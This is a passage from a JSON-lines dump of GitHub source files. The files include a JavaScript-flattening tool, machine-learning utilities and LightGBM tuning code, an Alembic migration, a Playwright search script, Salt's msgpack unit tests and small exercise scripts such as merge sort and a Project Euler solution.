load_sequence = parse_deps.calc_load_sequence(filenames, srcdir)\n\n # Stylesheets should be sourced from topmsot in, not inner-out.\n load_sequence.reverse()\n\n for module in load_sequence:\n for style_sheet in module.style_sheets:\n out.write(style_sheet.contents)\n if style_sheet.contents[-1] != '\\n':\n out.write('\\n')\n return out.getvalue()\n\ndef main(argv):\n parser = optparse.OptionParser(usage=\"flatten filename1.js [filename2.js ...]\",\n epilog=\"\"\"\nThis is a low-level flattening tool. You probably are meaning to run\ngenerate_standalone_timeline_view.py\n\"\"\")\n\n parser.add_option(\"--css\", dest=\"flatten_css\", action=\"store_true\", help=\"Outputs a flattened stylesheet.\")\n options, args = parser.parse_args(argv[1:])\n\n if len(args) == 0:\n sys.stderr.write(\"Expected: filename or filenames to flatten\\n\")\n return 255\n\n if options.flatten_css:\n sys.stdout.write(flatten_style_sheet_contents(args))\n else:\n sys.stdout.write(flatten_module_contents(args))\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"CyFI-Lab-Public/RetroScope","sub_path":"external/chromium-trace/trace-viewer/build/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"78"} +{"seq_id":"37314154192","text":"import os\nimport glob\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom typing import Dict, Tuple\n\nfrom sklearn.preprocessing import OrdinalEncoder, MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nfrom autoembedder.autoembedder import AutoEmbedder\n\n\ndef create_output_dir(out_dir: str) -> str:\n \"\"\"Create a given output directory if it does not exist.\"\"\"\n target_dir = os.path.join(\".\", out_dir, \"\")\n os.makedirs(target_dir, exist_ok=True)\n return target_dir\n\n\ndef save_model(\n auto_embedder: AutoEmbedder, output_directory: str, model_name: str = \"autoembedder\"\n) -> None:\n create_output_dir(output_directory)\n output_file = os.path.join(output_directory, model_name)\n auto_embedder.save(output_file)\n\n\ndef load_model(model_dir: str) -> AutoEmbedder:\n try:\n return tf.keras.models.load_model(\n model_dir, custom_objects={\"AutoEmbedder\": AutoEmbedder}\n )\n except OSError:\n print(f\"Warning: No model found in {model_dir}\")\n return None\n\n\ndef get_sorted_input_files(\n input_dir: str, input_patterns: list[str], input_extension: str = \"feather\"\n) -> list[str]:\n if input_patterns is None or input_patterns == \"\" or input_patterns == []:\n return sorted(glob.glob(f\"{input_dir}/*.{input_extension}\"), reverse=True)\n else:\n input_files = []\n for pattern in input_patterns:\n these_input_files = sorted(\n glob.glob(f\"{input_dir}/*{pattern}*.{input_extension}\")\n )\n input_files.extend(these_input_files)\n return input_files\n\n\ndef get_dtype_dict(df: pd.DataFrame) -> Dict[str, list[str]]:\n \"\"\"Create a dictionary for numerical and categorical columns.\n\n For given dataframe, return a dict where the keys 'numerical' and 'categorical'\n contain lists of all the numerical / categorical column names, respectively.\n \"\"\"\n df_type_dict = {\"numerical\": [], \"categorical\": []}\n\n for col_name in df.columns:\n if pd.api.types.is_numeric_dtype(df[col_name]):\n df_type_dict[\"numerical\"].append(col_name)\n else:\n df_type_dict[\"categorical\"].append(col_name)\n return df_type_dict","repo_name":"ezeeEric/autoembedder","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72274998013","text":"\"\"\"added relationship in users table\n\nRevision ID: 57daa3993187\nRevises: a0b49d1f62e9\nCreate Date: 2023-09-14 09:05:07.003466\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '57daa3993187'\ndown_revision = 'a0b49d1f62e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('nfl_players', schema=None) as batch_op:\n batch_op.drop_index('ix_nfl_players_last_name')\n batch_op.create_index(batch_op.f('ix_nfl_players_first_name'), ['first_name'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('nfl_players', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_nfl_players_first_name'))\n batch_op.create_index('ix_nfl_players_last_name', ['last_name'], unique=False)\n\n # ### end Alembic commands ###\n","repo_name":"sandyjtech/fleague","sub_path":"server/migrations/versions/57daa3993187_added_relationship_in_users_table.py","file_name":"57daa3993187_added_relationship_in_users_table.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33138004379","text":"user_input = input('Say something to your teacher').lower()\nwhile user_input != \"i'm a doctor\":\n if user_input.__contains__('?'):\n print('HAHAHA! AHAHAHAHHA!! OMG! What a silly question! Go back to school!')\n elif user_input.__contains__('!'):\n print('YES! YESS! I WANT YOU TO BE MOTIVATED!! YES!')\n else:\n print('Go back to school!')\n user_input = input('Say something else to your teacher')\nelse:\n print('Well done! You can now talk to me')","repo_name":"stokesy56/Python-Basics","sub_path":"Exercises/exercise9.py","file_name":"exercise9.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31891076530","text":"from playwright.sync_api import Playwright, sync_playwright, expect\n\n\ndef run(playwright: Playwright) -> None:\n browser = playwright.firefox.launch(headless=False)\n context = browser.new_context()\n\n # Open new page\n page = context.new_page()\n\n # Go to https://www.baidu.com/\n page.goto(\"https://www.baidu.com/\")\n\n # Fill input[name=\"wd\"]\n page.locator(\"input[name=\\\"wd\\\"]\").fill(\"nba\")\n\n # Press Enter\n page.locator(\"input[name=\\\"wd\\\"]\").press(\"Enter\")\n page.wait_for_url(\"https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=nba&fenlei=256&rsv_pq=b321d273002fe08b&rsv_t=e75f5z3kxPeIUCaB%2FDN1AYWXKR4nxs%2Bap8NppAl0mSh5MAWeec9R%2FcyiGRQ&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_sug3=3&rsv_sug1=3&rsv_sug7=100&rsv_sug2=0&rsv_btype=i&inputT=1276&rsv_sug4=1276\")\n\n # Close page\n page.close()\n\n # ---------------------\n context.close()\n browser.close()\n\n\nwith sync_playwright() as playwright:\n run(playwright)\n","repo_name":"CyclingPeach/Crawler-Project","sub_path":"Python3网络爬虫实战第二版笔记/第07章 JS动态渲染页面爬取/Playwright_script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"23034030818","text":"from langchain.document_loaders import UnstructuredWordDocumentLoader\n\n\nclass DocFileLoader:\n def load_data(self, url):\n loader = UnstructuredWordDocumentLoader(url)\n output = []\n data = loader.load()\n content = data[0].page_content\n meta_data = data[0].metadata\n meta_data[\"url\"] = \"local\"\n output.append({\"content\": content, \"meta_data\": meta_data})\n return output\n","repo_name":"Panthole-s-Lab/embedchain","sub_path":"embedchain/loaders/doc_file.py","file_name":"doc_file.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"26823955677","text":"#!/usr/bin/env python3\n\nimport math\n\nfrom itertools import chain, cycle, accumulate # last of which is Python 3 only\n\ndef factors(n):\n def prime_powers(n):\n # c goes through 2, 3, 5, then the infinite (6n + 1, 6n + 5) series\n for c in accumulate(chain([2, 1, 2], cycle([2, 4]))):\n if c * c > n: break\n if n % c: continue\n d, p = (), c\n while not n % c:\n n,p,d = n // c, p * c, d + (p,)\n yield d\n if n > 1: yield (n,)\n\n r = [1]\n for e in prime_powers(n):\n r += [a * b for a in r for b in e]\n return r\n\ndef is_prime(n):\n if n % 2 == 0:\n return False\n\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n return True\n\ndef main():\n return max(filter(is_prime, factors(600851475143)))\n\nif __name__ == '__main__':\n x = main()\n assert(x == 6857)\n print(x)","repo_name":"catb0t/projects-backup","sub_path":"py/euler/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16176037217","text":"import lightgbm as lgb\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\ndata = np.loadtxt(open(\"./mean_train_data.csv\", \"rb\"), delimiter = \",\", skiprows = 0).astype(int)\ntarget = np.loadtxt(open(\"./mean_train_label.csv\", \"rb\"), delimiter = \",\", skiprows = 0)\nX_train,X_test,y_train,y_test =train_test_split(data,target,random_state=0,test_size=0.2)\n\n\n#choose n_estimators\nparams = {\n 'boosting_type': 'gbdt',\n 'objective': 'regression',\n 'metric': 'rmse',\n 'nthread': 8,\n 'learning_rate': 0.1,\n 'num_leaves': 100,\n 'max_depth': 6,\n 'subsample': 0.8,\n 'colsample_bytree': 0.8,\n}\n\ndata_train = lgb.Dataset(X_train, y_train)\ncv_results = lgb.cv(params, data_train, num_boost_round=1000, nfold=5, stratified=False, shuffle=True, metrics='rmse',\n early_stopping_rounds=100, seed=0)\n# cv_results = lgb.cv(\n# params, data_train, num_boost_round=1000, nfold=5, stratified=False, shuffle=True, metrics='rmse',\n# early_stopping_rounds=50, verbose_eval=50, show_stdv=True, seed=0)\n\nprint('best n_estimators:', len(cv_results['rmse-mean']))\nprint('best cv score:', pd.Series(cv_results['rmse-mean']).max())\n# RMSE:best n_estimators: 289 ,best cv score: 212.7707418568886\n# MAE:best n_estimators: inf ,best cv score: 37.933071219886145\n\n\n\"\"\"\n# #chose max_depth and num_leaves\n# params_test1 = {'max_depth':[6], 'num_leaves': [100]}\n#\n# gsearch1 = GridSearchCV(\n# estimator=lgb.LGBMRegressor(objective='regression', metrics='rmse', learning_rate=0.1,\n# n_estimators=289, max_depth=6, subsample=0.8, colsample_bytree=0.8),\n# param_grid=params_test1, scoring='neg_mean_squared_error', cv=3, verbose=1, n_jobs=4, return_train_score=True)#n_jobs – Number of parallel threads.\n# gsearch1.fit(X_train, y_train)\n# gsearch1.grid_scores__, gsearch1.best_params_, gsearch1.best_score_\n\nparams_test1={\n 'max_depth': [7],\n 'num_leaves':[120]\n}\nmodel_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=50,\n learning_rate=0.1, n_estimators=50, max_depth=7,\n metric='rmse', bagging_fraction = 0.8,feature_fraction = 0.8)\ngsearch1 = GridSearchCV(estimator=model_lgb, param_grid=params_test1, scoring='neg_mean_squared_error',\n cv=3, verbose=1, n_jobs=4, return_train_score=True)\ngsearch1.fit(X_train, y_train)\ngsearch1.grid_scores__, gsearch1.best_params_, gsearch1.best_score_\n\n#choose min_data_in_leaf\n# params_test2={'min_data_in_leaf':range(10,102,10)}\n# gsearch2 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test2, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch2.fit(X_train,y_train)\n# gsearch2.grid_scores__, gsearch2.best_params_, gsearch2.best_score_\n#\n# #choose colsample_bytree and subsample\n# params_test3={'colsample_bytree': [0.6,0.7,0.8,0.9,1.0],\n# 'subsample': [0.6,0.7,0.8,0.9,1.0]}\n# gsearch3 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test3, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch3.fit(X_train,y_train)\n# gsearch3.grid_scores__, gsearch3.best_params_, gsearch3.best_score_\n#\n# #choose lambda_l1 and lambda_l2\n# params_test4={'lambda_l1': [1e-5,1e-3,1e-1,0.0,0.1,0.3],\n# 'lambda_l2': [1e-5,1e-3,1e-1,0.0,0.1,0.3]}\n# gsearch4 = GridSearchCV(estimator = lgb.LGBMRegressor(objective='regression',metrics='rmse',learning_rate=0.1, n_estimators=289, max_depth=4, num_leaves=10,subsample=0.8, colsample_bytree=0.8,nthread=7),\n# param_grid = params_test4, scoring='neg_mean_squared_error',cv=5,n_jobs=-1, return_train_score = True)\n# gsearch4.fit(X_train,y_train)\n# gsearch4.grid_scores__, gsearch4.best_params_, gsearch4.best_score_\n\"\"\"","repo_name":"XiaoYanxin/tencent_ad","sub_path":"lgbm_tuning parameters.py","file_name":"lgbm_tuning parameters.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"13405439571","text":"# Merge sort recursively divides the list into two repeatedly and then merges the smaller lists back into a larger one in the correct order.\nimport sys\n\ndef merge_sort():\n with open(sys.argv[1]) as f:\n lines = [int(x.rstrip(\"\\n\")) for x in f.readlines()]\n\n result = msort(lines)\n print(result)\n return result\n\ndef msort(arr):\n if len(arr) < 2:\n return arr\n \n mid = len(arr) //2\n # want to do it to the right half and left half recursivley\n left_arr = msort(arr[:mid])\n right_arr = msort(arr[mid:])\n result = []\n i = 0\n j = 0\n\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] < right_arr[j]:\n result.append(left_arr[i])\n i+=1\n else:\n result.append(right_arr[j])\n j+=1\n\n result += left_arr[i:]\n result += right_arr[j:]\n return result\n\n\nif __name__ == \"__main__\":\n merge_sort()","repo_name":"maxengelhard/computerscience","sub_path":"sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12856071564","text":"\"\"\"\nTest the MessagePack utility\n\"\"\"\nimport inspect\nimport os\nimport pprint\nimport struct\nimport sys\nfrom io import BytesIO\n\nimport pytest\n\nimport salt.utils.msgpack\nfrom salt.utils.odict import OrderedDict\nfrom tests.support.unit import TestCase\n\ntry:\n import msgpack\nexcept ImportError:\n import msgpack_pure as msgpack # pylint: disable=import-error\n\n\n# A keyword to pass to tests that use `raw`, which was added in msgpack 0.5.2\nraw = {\"raw\": False} if msgpack.version > (0, 5, 2) else {}\n\n\n@pytest.mark.skipif(\n not salt.utils.msgpack.HAS_MSGPACK, reason=\"msgpack module required for these tests\"\n)\nclass TestMsgpack(TestCase):\n \"\"\"\n In msgpack, the following aliases exist:\n load = unpack\n loads = unpackb\n dump = pack\n dumps = packb\n The salt.utils.msgpack versions of these functions are not aliases,\n verify that they pass the same relevant tests from:\n https://github.com/msgpack/msgpack-python/blob/master/test/\n \"\"\"\n\n test_data = [\n 0,\n 1,\n 127,\n 128,\n 255,\n 256,\n 65535,\n 65536,\n 4294967295,\n 4294967296,\n -1,\n -32,\n -33,\n -128,\n -129,\n -32768,\n -32769,\n -4294967296,\n -4294967297,\n 1.0,\n b\"\",\n b\"a\",\n b\"a\" * 31,\n b\"a\" * 32,\n None,\n True,\n False,\n (),\n ((),),\n (\n (),\n None,\n ),\n {None: 0},\n (1 << 23),\n ]\n\n def test_version(self):\n \"\"\"\n Verify that the version exists and returns a value in the expected format\n \"\"\"\n version = salt.utils.msgpack.version\n self.assertTrue(isinstance(version, tuple))\n self.assertGreater(version, (0, 0, 0))\n\n def test_Packer(self):\n data = os.urandom(1024)\n packer = salt.utils.msgpack.Packer()\n unpacker = msgpack.Unpacker(None)\n\n packed = packer.pack(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacker.feed(packed)\n unpacked = msgpack.unpackb(packed)\n self.assertEqual(data, unpacked)\n\n def test_Unpacker(self):\n data = os.urandom(1024)\n packer = msgpack.Packer()\n unpacker = salt.utils.msgpack.Unpacker(None)\n\n packed = packer.pack(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacker.feed(packed)\n unpacked = msgpack.unpackb(packed)\n self.assertEqual(data, unpacked)\n\n def test_array_size(self):\n sizes = [0, 5, 50, 1000]\n bio = BytesIO()\n packer = salt.utils.msgpack.Packer()\n for size in sizes:\n bio.write(packer.pack_array_header(size))\n for i in range(size):\n bio.write(packer.pack(i))\n\n bio.seek(0)\n unpacker = salt.utils.msgpack.Unpacker(bio, use_list=True)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), list(range(size)))\n\n def test_manual_reset(self):\n sizes = [0, 5, 50, 1000]\n packer = salt.utils.msgpack.Packer(autoreset=False)\n for size in sizes:\n packer.pack_array_header(size)\n for i in range(size):\n packer.pack(i)\n\n bio = BytesIO(packer.bytes())\n unpacker = salt.utils.msgpack.Unpacker(bio, use_list=True)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), list(range(size)))\n\n packer.reset()\n self.assertEqual(packer.bytes(), b\"\")\n\n def test_map_size(self):\n sizes = [0, 5, 50, 1000]\n bio = BytesIO()\n packer = salt.utils.msgpack.Packer()\n for size in sizes:\n bio.write(packer.pack_map_header(size))\n for i in range(size):\n bio.write(packer.pack(i)) # key\n bio.write(packer.pack(i * 2)) # value\n\n bio.seek(0)\n if salt.utils.msgpack.version > (0, 6, 0):\n unpacker = salt.utils.msgpack.Unpacker(bio, strict_map_key=False)\n else:\n unpacker = salt.utils.msgpack.Unpacker(bio)\n for size in sizes:\n self.assertEqual(unpacker.unpack(), {i: i * 2 for i in range(size)})\n\n def test_max_buffer_size(self):\n \"\"\"\n Test if max buffer size allows at least 100MiB\n \"\"\"\n bio = BytesIO()\n bio.write(salt.utils.msgpack.packb(\"0\" * (100 * 1024 * 1024)))\n bio.seek(0)\n unpacker = salt.utils.msgpack.Unpacker(bio)\n raised = False\n try:\n unpacker.unpack()\n except ValueError:\n raised = True\n self.assertFalse(raised)\n\n def test_exceptions(self):\n # Verify that this exception exists\n self.assertTrue(salt.utils.msgpack.exceptions.PackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.UnpackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.PackValueError)\n self.assertTrue(salt.utils.msgpack.exceptions.UnpackValueError)\n\n def test_function_aliases(self):\n \"\"\"\n Fail if core functionality from msgpack is missing in the utility\n \"\"\"\n\n def sanitized(item):\n if inspect.isfunction(getattr(msgpack, item)):\n # Only check objects that exist in the same file as msgpack\n return inspect.getfile(getattr(msgpack, item)) == inspect.getfile(\n msgpack\n )\n\n msgpack_items = {\n x for x in dir(msgpack) if not x.startswith(\"_\") and sanitized(x)\n }\n msgpack_util_items = set(dir(salt.utils.msgpack))\n self.assertFalse(\n msgpack_items - msgpack_util_items,\n \"msgpack functions with no alias in `salt.utils.msgpack`\",\n )\n\n def _test_base(self, pack_func, unpack_func):\n \"\"\"\n In msgpack, 'dumps' is an alias for 'packb' and 'loads' is an alias for 'unpackb'.\n Verify that both salt.utils.msgpack function variations pass the exact same test\n \"\"\"\n data = os.urandom(1024)\n\n packed = pack_func(data)\n # Sanity Check\n self.assertTrue(packed)\n self.assertIsInstance(packed, bytes)\n self.assertNotEqual(data, packed)\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacked = unpack_func(packed)\n self.assertEqual(data, unpacked)\n\n def _test_buffered_base(self, pack_func, unpack_func):\n data = os.urandom(1024).decode(errors=\"ignore\")\n buffer = BytesIO()\n # Sanity check, we are not borking the BytesIO read function\n self.assertNotEqual(BytesIO.read, buffer.read)\n buffer.read = buffer.getvalue\n pack_func(data, buffer)\n # Sanity Check\n self.assertTrue(buffer.getvalue())\n self.assertIsInstance(buffer.getvalue(), bytes)\n self.assertNotEqual(data, buffer.getvalue())\n\n # Reverse the packing and the result should be equivalent to the original data\n unpacked = unpack_func(buffer)\n\n if isinstance(unpacked, bytes):\n unpacked = unpacked.decode()\n\n self.assertEqual(data, unpacked)\n\n def test_buffered_base_pack(self):\n self._test_buffered_base(\n pack_func=salt.utils.msgpack.pack, unpack_func=msgpack.unpack\n )\n\n def test_buffered_base_unpack(self):\n self._test_buffered_base(\n pack_func=msgpack.pack, unpack_func=salt.utils.msgpack.unpack\n )\n\n def _test_unpack_array_header_from_file(self, pack_func, **kwargs):\n f = BytesIO(pack_func([1, 2, 3, 4]))\n unpacker = salt.utils.msgpack.Unpacker(f)\n self.assertEqual(unpacker.read_array_header(), 4)\n self.assertEqual(unpacker.unpack(), 1)\n self.assertEqual(unpacker.unpack(), 2)\n self.assertEqual(unpacker.unpack(), 3)\n self.assertEqual(unpacker.unpack(), 4)\n self.assertRaises(salt.utils.msgpack.exceptions.OutOfData, unpacker.unpack)\n\n @pytest.mark.skipif(\n not hasattr(sys, \"getrefcount\"), \"sys.getrefcount() is needed to pass this test\"\n )\n def _test_unpacker_hook_refcnt(self, pack_func, **kwargs):\n result = []\n\n def hook(x):\n result.append(x)\n return x\n\n basecnt = sys.getrefcount(hook)\n\n up = salt.utils.msgpack.Unpacker(object_hook=hook, list_hook=hook)\n\n self.assertGreaterEqual(sys.getrefcount(hook), basecnt + 2)\n\n up.feed(pack_func([{}]))\n up.feed(pack_func([{}]))\n self.assertEqual(up.unpack(), [{}])\n self.assertEqual(up.unpack(), [{}])\n self.assertEqual(result, [{}, [{}], {}, [{}]])\n\n del up\n\n self.assertEqual(sys.getrefcount(hook), basecnt)\n\n def _test_unpacker_ext_hook(self, pack_func, **kwargs):\n class MyUnpacker(salt.utils.msgpack.Unpacker):\n def __init__(self):\n my_kwargs = {}\n super().__init__(ext_hook=self._hook, **raw)\n\n def _hook(self, code, data):\n if code == 1:\n return int(data)\n else:\n return salt.utils.msgpack.ExtType(code, data)\n\n unpacker = MyUnpacker()\n unpacker.feed(pack_func({\"a\": 1}))\n self.assertEqual(unpacker.unpack(), {\"a\": 1})\n unpacker.feed(pack_func({\"a\": salt.utils.msgpack.ExtType(1, b\"123\")}))\n self.assertEqual(unpacker.unpack(), {\"a\": 123})\n unpacker.feed(pack_func({\"a\": salt.utils.msgpack.ExtType(2, b\"321\")}))\n self.assertEqual(\n unpacker.unpack(), {\"a\": salt.utils.msgpack.ExtType(2, b\"321\")}\n )\n\n def _check(\n self, data, pack_func, unpack_func, use_list=False, strict_map_key=False\n ):\n my_kwargs = {}\n if salt.utils.msgpack.version >= (0, 6, 0):\n my_kwargs[\"strict_map_key\"] = strict_map_key\n ret = unpack_func(pack_func(data), use_list=use_list, **my_kwargs)\n self.assertEqual(ret, data)\n\n def _test_pack_unicode(self, pack_func, unpack_func):\n test_data = [\"\", \"abcd\", [\"defgh\"], \"Русский текст\"]\n for td in test_data:\n ret = unpack_func(pack_func(td), use_list=True, **raw)\n self.assertEqual(ret, td)\n packer = salt.utils.msgpack.Packer()\n data = packer.pack(td)\n ret = salt.utils.msgpack.Unpacker(\n BytesIO(data), use_list=True, **raw\n ).unpack()\n self.assertEqual(ret, td)\n\n def _test_pack_bytes(self, pack_func, unpack_func):\n test_data = [\n b\"\",\n b\"abcd\",\n (b\"defgh\",),\n ]\n for td in test_data:\n self._check(td, pack_func, unpack_func)\n\n def _test_pack_byte_arrays(self, pack_func, unpack_func):\n test_data = [\n bytearray(b\"\"),\n bytearray(b\"abcd\"),\n (bytearray(b\"defgh\"),),\n ]\n for td in test_data:\n self._check(td, pack_func, unpack_func)\n\n def _test_ignore_unicode_errors(self, pack_func, unpack_func):\n ret = unpack_func(\n pack_func(b\"abc\\xeddef\", use_bin_type=False), unicode_errors=\"ignore\", **raw\n )\n self.assertEqual(\"abcdef\", ret)\n\n def _test_strict_unicode_unpack(self, pack_func, unpack_func):\n packed = pack_func(b\"abc\\xeddef\", use_bin_type=False)\n self.assertRaises(UnicodeDecodeError, unpack_func, packed, use_list=True, **raw)\n\n def _test_ignore_errors_pack(self, pack_func, unpack_func):\n ret = unpack_func(\n pack_func(\"abc\\uDC80\\uDCFFdef\", use_bin_type=True, unicode_errors=\"ignore\"),\n use_list=True,\n **raw\n )\n self.assertEqual(\"abcdef\", ret)\n\n def _test_decode_binary(self, pack_func, unpack_func):\n ret = unpack_func(pack_func(b\"abc\"), use_list=True)\n self.assertEqual(b\"abc\", ret)\n\n @pytest.mark.skipif(\n salt.utils.msgpack.version < (0, 2, 2),\n \"use_single_float was added in msgpack==0.2.2\",\n )\n def _test_pack_float(self, pack_func, **kwargs):\n self.assertEqual(\n b\"\\xca\" + struct.pack(\">f\", 1.0), pack_func(1.0, use_single_float=True)\n )\n self.assertEqual(\n b\"\\xcb\" + struct.pack(\">d\", 1.0),\n pack_func(1.0, use_single_float=False),\n )\n\n def _test_odict(self, pack_func, unpack_func):\n seq = [(b\"one\", 1), (b\"two\", 2), (b\"three\", 3), (b\"four\", 4)]\n\n od = OrderedDict(seq)\n self.assertEqual(dict(seq), unpack_func(pack_func(od), use_list=True))\n\n def pair_hook(seq):\n return list(seq)\n\n self.assertEqual(\n seq, unpack_func(pack_func(od), object_pairs_hook=pair_hook, use_list=True)\n )\n\n def _test_pair_list(self, unpack_func, **kwargs):\n pairlist = [(b\"a\", 1), (2, b\"b\"), (b\"foo\", b\"bar\")]\n packer = salt.utils.msgpack.Packer()\n packed = packer.pack_map_pairs(pairlist)\n if salt.utils.msgpack.version > (0, 6, 0):\n unpacked = unpack_func(packed, object_pairs_hook=list, strict_map_key=False)\n else:\n unpacked = unpack_func(packed, object_pairs_hook=list)\n self.assertEqual(pairlist, unpacked)\n\n @pytest.mark.skipif(\n salt.utils.msgpack.version < (0, 6, 0),\n \"getbuffer() was added to Packer in msgpack 0.6.0\",\n )\n def _test_get_buffer(self, pack_func, **kwargs):\n packer = msgpack.Packer(autoreset=False, use_bin_type=True)\n packer.pack([1, 2])\n strm = BytesIO()\n strm.write(packer.getbuffer())\n written = strm.getvalue()\n\n expected = pack_func([1, 2], use_bin_type=True)\n self.assertEqual(expected, written)\n\n @staticmethod\n def no_fail_run(test, *args, **kwargs):\n \"\"\"\n Run a test without failure and return any exception it raises\n \"\"\"\n try:\n test(*args, **kwargs)\n except Exception as e: # pylint: disable=broad-except\n return e\n\n def test_binary_function_compatibility(self):\n functions = [\n {\"pack_func\": salt.utils.msgpack.packb, \"unpack_func\": msgpack.unpackb},\n {\"pack_func\": msgpack.packb, \"unpack_func\": salt.utils.msgpack.unpackb},\n ]\n # These functions are equivalent but could potentially be overwritten\n if salt.utils.msgpack.dumps is not salt.utils.msgpack.packb:\n functions.append(\n {\"pack_func\": salt.utils.msgpack.dumps, \"unpack_func\": msgpack.unpackb}\n )\n if salt.utils.msgpack.loads is not salt.utils.msgpack.unpackb:\n functions.append(\n {\"pack_func\": msgpack.packb, \"unpack_func\": salt.utils.msgpack.loads}\n )\n\n test_funcs = (\n self._test_base,\n self._test_unpack_array_header_from_file,\n self._test_unpacker_hook_refcnt,\n self._test_unpacker_ext_hook,\n self._test_pack_unicode,\n self._test_pack_bytes,\n self._test_pack_byte_arrays,\n self._test_ignore_unicode_errors,\n self._test_strict_unicode_unpack,\n self._test_ignore_errors_pack,\n self._test_decode_binary,\n self._test_pack_float,\n self._test_odict,\n self._test_pair_list,\n self._test_get_buffer,\n )\n errors = {}\n for test_func in test_funcs:\n # Run the test without the salt.utils.msgpack module for comparison\n vanilla_run = self.no_fail_run(\n test_func,\n **{\"pack_func\": msgpack.packb, \"unpack_func\": msgpack.unpackb}\n )\n\n for func_args in functions:\n func_name = (\n func_args[\"pack_func\"]\n if func_args[\"pack_func\"].__module__.startswith(\"salt.utils\")\n else func_args[\"unpack_func\"]\n )\n if hasattr(TestCase, \"subTest\"):\n with self.subTest(test=test_func.__name__, func=func_name.__name__):\n # Run the test with the salt.utils.msgpack module\n run = self.no_fail_run(test_func, **func_args)\n # If the vanilla msgpack module errored, then skip if we got the same error\n if run:\n if str(vanilla_run) == str(run):\n self.skipTest(\n \"Failed the same way as the vanilla msgpack\"\n \" module:\\n{}\".format(run)\n )\n else:\n # If subTest isn't available then run the tests collect the errors of all the tests before failing\n run = self.no_fail_run(test_func, **func_args)\n if run:\n # If the vanilla msgpack module errored, then skip if we got the same error\n if str(vanilla_run) == str(run):\n self.skipTest(\n \"Test failed the same way the vanilla msgpack module\"\n \" fails:\\n{}\".format(run)\n )\n else:\n errors[(test_func.__name__, func_name.__name__)] = run\n\n if errors:\n self.fail(pprint.pformat(errors))\n","repo_name":"saltstack/salt","sub_path":"tests/unit/utils/test_msgpack.py","file_name":"test_msgpack.py","file_ext":"py","file_size_in_byte":17629,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"26013837972","text":"#Initialize progrom\ncourses_string = \"\"\nstudents = []\ncourses = ['english', 'math','history']\ngrades_english = {}.fromkeys(students,) #Create a dict\ngrades_math = {}.fromkeys(students,)\ngrades_history = {}.fromkeys(students,)\n\n#Combine al grades in another dictionary\ngrades = {courses[0] : grades_english , courses[1] : grades_math, courses[2] : grades_history}\n\ncontinueFlag = 1\ncourses_amount = len(courses)\n\n#We want to transform the list containing the cources into a proper string so it can be printed.\nfor i in range(courses_amount):\n courses_string += courses[i].capitalize()\n if i < (courses_amount - 2):\n courses_string += \", \"\n elif i == (courses_amount - 2):\n courses_string += \" and \"\n\n\nwhile continueFlag:\n\n #Ask for name\n name = input(\"What is the student's name? \")\n\n #Ask for course and determine whether it exists\n chooseCourse = 1\n while chooseCourse:\n course = 